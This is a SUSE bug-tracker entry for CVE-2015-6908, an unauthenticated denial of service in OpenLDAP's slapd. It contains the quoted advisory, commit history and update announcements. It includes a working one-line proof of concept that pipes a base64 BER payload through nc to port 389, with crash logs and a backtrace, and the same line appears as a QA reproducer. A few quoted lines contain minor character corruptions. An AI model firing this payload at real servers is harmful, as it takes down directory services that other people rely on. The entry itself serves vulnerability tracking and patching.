Bug 945582 - (CVE-2015-6908) VUL-0: CVE-2015-6908: openldap2: ber_get_next remote denial of service vulnerability
(CVE-2015-6908)
VUL-0: CVE-2015-6908: openldap2: ber_get_next remote denial of service vulner...
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P2 - High : Major
: ---
Assigned To: Howard Guo
Security Team bot
https://smash.suse.de/issue/156508/
CVSSv2:RedHat:CVE-2015-6908:5.0:(AV:N...
:
Depends on:
Blocks: 987916
  Show dependency treegraph
 
Reported: 2015-09-12 05:50 UTC by Marcus Meissner
Modified: 2017-08-02 14:02 UTC (History)
8 users (show)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments
CVE-2015-6908.patch (2.00 KB, patch)
2015-10-02 11:57 UTC, Andreas Stieger
Details | Diff

Note You need to log in before you can comment on or make changes to this bug.
Description Marcus Meissner 2015-09-12 05:50:02 UTC
via oss-sec

http://www.openldap.org/its/index.cgi/Software%20Bugs?id=8240
OpenLDAP ber_get_next Denial of Service
Affected Versions: OpenLDAP <= 2.4.42

+-------------+
| Description |
+-------------+
This document details a vulnerability found within the OpenLDAP server daemon. A
Denial of Service vulnerability was discovered within the slapd daemon, allowing
an unauthenticated attacker to crash the OpenLDAP server.

By sending a crafted packet, an attacker may cause the OpenLDAP server to reach
an assert(9 9 statement, crashing the daemon. This was tested on OpenLDAP 2.4.42
(built with GCC 4.9.2) and OpenLDAP 2.4.40 installed from the Debian package
repository.

+--------------+
| Exploitation |
+--------------+
By sending a crafted packet, an attacker can cause the OpenLDAP daemon to crash
with a SIGABRT. This is due to an assert() call within the ber_get_next method
(io.c line 682) that is hit when decoding tampered BER data. 

The following proof of concept exploit can be used to trigger the condition:

--[ Exploit POC
echo "/4SEhISEd4MKYj5ZMgAAAC8=" | base64 -d | nc -v 127.0.0.1 389

The above causes slapd to abort as follows when running with '-d3', however it
should be noted that this will crash the server even when running in daemon
mode. 

--[ adadp -d3
55f0b36e slap_listener_activate(7): 
55f0b36e >>> slap_listener(ldap:///)
55f0b36e connection_get(15): got connid=1000
55f0b36e connection_read(15): checking for input on id=1000
ber_get_next
ldap_read: want=8, got=8
  0000:  ff 84 84 84 84 84 77 83                            ......w.          
55f0b36e connection_get(15): got connid=1000
55f0b36e connection_read(15): checking for input on id=1000
ber_get_next
ldap_read: want=1, got=1
  0000:  0a                                                 .                 
55f0b36e connection_get(15): got connid=1000
55f0b36e connection_read(15): checking for input on id=1000
ber_get_next
slapd: io.c:682: ber_get_next: Assertion `0' failed.

The following GDB back trace provides further information as to the location of
the issue.

--[ back trace
program received signal SIGABRT, Aborted.
[Switching to Thread 0x7ffff2e4a700 (LWP 1371)]
0x00007ffff6a13107 in __GI_raise (sig=sig@entry=6) at
../nptl/sysdeps/unix/sysv/linux/raise.c:56
56	../nptl/sysdeps/ux%x/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0  0x00007ffff6a13107 in __GI_raise (sig=sig@entry=6) at
../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1  0x00007ffff6a144e8 in __GI_abort () at abort.c:89
#2  0x00007ffff6a0c226 in __assert_fail_base (fmt=0x7ffff6b42ce8 "%s%s%s:%u:
%s%sAssertion `%s' failed.\n%n", assertion=assertion@entry=0x55f280 "0",
file=file@entry=0x59bdb1 "io.c", 
    line=line@entry=682, function=function@entry=0x59bf33
<__PRETTY_FUNCTION__.6337> "r_r_get_next") at assert.c:92
#3  0x00007ffff6a0c2d2 in __GI___assert_fail (assertion=assertion@entry=0x55f280
"0", file=file@entry=0x59bdb1 "io.c", line=line@entry=682, 
    function=function@entry=0x59bf33 <__PRETTY_FUNCTION__.6337>
"ber_get_next")
at assert.c:101
#4  0x000000000053261a in ber_get_next (sb=0x7fffe40008c0, len=0x7ffff2e49b40,
ber=0x7fffe4000a00) at io.c:682
#5  0x0000000000420b56 in connection_input (cri=<optimized out>,
conn=<optimized
out>) at connection.c:1572
#6  connection_read (cri=<optimiz o out>, s=<optimized out>) at
connection.c:1460
#7  connection_read_thread (ctx=0x7ffff2e49b90, argv=0xf) at connection.c:1284
#8  0x000000000050c871 in ldap_int_thread_pool_wrapper (xpool=0x8956c0) at
tpool.c:696
#9  0x00007ffff6d8f0a4 in start_thread (arg=0x7ffff2e4a700) at
pthread_create.c:309
#10 0x00007ffff6ac404d in clone () at
../sysdeps/unix/sysv/linux/x86_64/clone.S:111

+----------+
| Solution |
+----------+
Ensure that data received from untrusted sources is not able to trigger
conditions resulting in the server crashing. In this specific instance, the
NDEBUG macro should be defined before the inclusion of assert.h by default,
requiring a specific compile time alteration to enable debug.
Comment 1 Marcus Meissner 2015-09-12 05:50:47 UTC
QA REPRODUCER:

echo "/4SEhISEd4MKYj5ZMgAAAC8=" | base64 -d | nc -v 127.0.0.1 389

before:
abort() the ldap server

after:
not aborting the ldap server
Comment 2 Marcus Meissner 2015-09-12 05:55:24 UTC
the assert(0) at the end of ber_get_next is even in sle10
Comment 3 Victor Pereira 2015-09-30 08:49:42 UTC
hi maintainer,

could you please submit to the affected codestreams?
Comment 4 Andreas Stieger 2015-10-02 11:57:45 UTC
Created attachment 649914 [details]
CVE-2015-6908.patch

There was some discussion upstream about whether this was a bug. The back-and-forth simple patch is below and attached as a combined patch.





commit 844ee7df820fa397249ce76984d2e7094746cd93
Author: Howard Chu <hyc@symas.com>
Date:   Sat Sep 12 22:18:22 2015 +0100

    Revert "Revert "ITS#8240 remove obsolete assert""
    
    We have never documented our use of assert, so can't expect
    builders to do the right thing.
    This reverts commit 55dd4d3275d24c5190fdfada8dfae0320628b993.

commit 55dd4d3275d24c5190fdfada8dfae0320628b993
Author: Howard Chu <hyc@openldap.org>
Date:   Sat Sep 12 10:07:16 2015 +0100

    Revert "ITS#8240 remove obsolete assert"
    
    Not a bug.
    This reverts commit 6fe51a9ab04fd28bbc171da3cf12f1c1040d6629.

commit 6fe51a9ab04fd28bbc171da3cf12f1c1040d6629
Author: Howard Chu <hyc@openldap.org>
Date:   Thu Sep 10 00:37:32 2015 +0100

    ITS#8240 remove obsolete assert
Comment 6 Swamp Workflow Management 2015-10-02 12:01:03 UTC
An update workflow for this issue was started.
This issue was rated as important.
Please submit fixed packages until 2015-10-09.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/62299
Comment 9 Sebastian Krahmer 2015-11-30 14:45:46 UTC
poing
Comment 14 Bernhard Wiedemann 2015-12-02 14:00:13 UTC
This is an autogenerated message for OBS integration:
This bug (945582) was mentioned in
https://build.opensuse.org/request/show/347172 Factory / openldap2
Comment 16 Swamp Workflow Management 2016-01-12 19:13:09 UTC
SUSE-SU-2016:0090-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 945582
CVE References: CVE-2015-6908
Sources used:
SUSE Linux Enterprise Software Development Kit 11-SP4 (src):    openldap2-2.4.26-0.62.2, openldap2-client-2.4.26-0.62.2
SUSE Linux Enterprise Software Development Kit 11-SP3 (src):    openldap2-2.4.26-0.62.2, openldap2-client-2.4.26-0.62.2
SUSE Linux Enterprise Server for VMWare 11-SP3 (src):    openldap2-2.4.26-0.62.2, openldap2-client-2.4.26-0.62.2
SUSE Linux Enterprise Server 11-SP4 (src):    openldap2-2.4.26-0.62.2, openldap2-client-2.4.26-0.62.2
SUSE Linux Enterprise Server 11-SP3 (src):    openldap2-2.4.26-0.62.2, openldap2-client-2.4.26-0.62.2
SUSE Linux Enterprise Server 11-SECURITY (src):    openldap2-client-openssl1-2.4.26-0.62.3
SUSE Linux Enterprise Desktop 11-SP4 (src):    openldap2-client-2.4.26-0.62.2
SUSE Linux Enterprise Desktop 11-SP3 (src):    openldap2-client-2.4.26-0.62.2
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    openldap2-2.4.26-0.62.2, openldap2-client-2.4.26-0.62.2
SUSE Linux Enterprise Debuginfo 11-SP3 (src):    openldap2-2.4.26-0.62.2, openldap2-client-2.4.26-0.62.2, openldap2-client-openssl1-2.4.26-0.62.3
Comment 23 Andreas Stieger 2016-01-14 19:46:44 UTC
For bsc#904028, bsc#937766, bsc#945582, bsc#955210 please submit for openSUSE 13.2 maintenance.
Comment 24 Bernhard Wiedemann 2016-01-18 10:00:32 UTC
This is an autogenerated message for OBS integration:
This bug (945582) was mentioned in
https://build.opensuse.org/request/show/354485 13.2 / openldap2
Comment 25 Swamp Workflow Management 2016-01-25 12:12:32 UTC
SUSE-SU-2016:0224-1: An update that solves two vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 937766,945582,955210
CVE References: CVE-2015-4000,CVE-2015-6908
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP1 (src):    openldap2-2.4.41-18.13.4, openldap2-client-2.4.41-18.13.1
SUSE Linux Enterprise Software Development Kit 12 (src):    openldap2-2.4.41-18.13.4, openldap2-client-2.4.41-18.13.1
SUSE Linux Enterprise Server for SAP 12 (src):    openldap2-2.4.41-18.13.4
SUSE Linux Enterprise Server 12-SP1 (src):    openldap2-2.4.41-18.13.4, openldap2-client-2.4.41-18.13.1
SUSE Linux Enterprise Server 12 (src):    openldap2-2.4.41-18.13.4, openldap2-client-2.4.41-18.13.1
SUSE Linux Enterprise Module for Legacy Software 12 (src):    openldap2-2.4.41-18.13.4
SUSE Linux Enterprise Desktop 12-SP1 (src):    openldap2-client-2.4.41-18.13.1
SUSE Linux Enterprise Desktop 12 (src):    openldap2-client-2.4.41-18.13.1
Comment 26 Swamp Workflow Management 2016-01-25 12:14:10 UTC
openSUSE-SU-2016:0226-1: An update that solves two vulnerabilities and has two fixes is now available.

Category: security (important)
Bug References: 904028,937766,945582,955210
CVE References: CVE-2015-4000,CVE-2015-6908
Sources used:
openSUSE 13.2 (src):    openldap2-2.4.39-8.9.1, openldap2-client-2.4.39-8.9.1
Comment 27 Swamp Workflow Management 2016-01-27 10:12:34 UTC
openSUSE-SU-2016:0255-1: An update that solves two vulnerabilities and has two fixes is now available.

Category: security (important)
Bug References: 904028,937766,945582,955210
CVE References: CVE-2015-4000,CVE-2015-6908
Sources used:
openSUSE 13.1 (src):    openldap2-2.4.33-8.6.1, openldap2-client-2.4.33-8.6.1
Comment 28 Andreas Stieger 2016-01-27 15:35:44 UTC
Releasing last updates, all done
Comment 29 Swamp Workflow Management 2016-01-27 18:12:16 UTC
openSUSE-SU-2016:0261-1: An update that solves two vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 937766,945582,955210
CVE References: CVE-2015-4000,CVE-2015-6908
Sources used:
openSUSE Leap 42.1 (src):    openldap2-2.4.41-11.1, openldap2-client-2.4.41-11.1
Comment 30 Swamp Workflow Management 2016-01-27 18:12:55 UTC
SUSE-SU-2016:0262-1: An update that fixes two vulnerabilities is now available.

Category: security (important)
Bug References: 937766,945582
CVE References: CVE-2015-4000,CVE-2015-6908
Sources used:
SUSE Studio Onsite 1.3 (src):    openldap2-client-2.4.26-0.17.23.1
Comment 34 Bernhard Wiedemann 2017-08-02 14:02:15 UTC
This is an autogenerated message for OBS integration:
This bug (945582) was mentioned in
https://build.opensuse.org/request/show/514048 42.3 / openldap2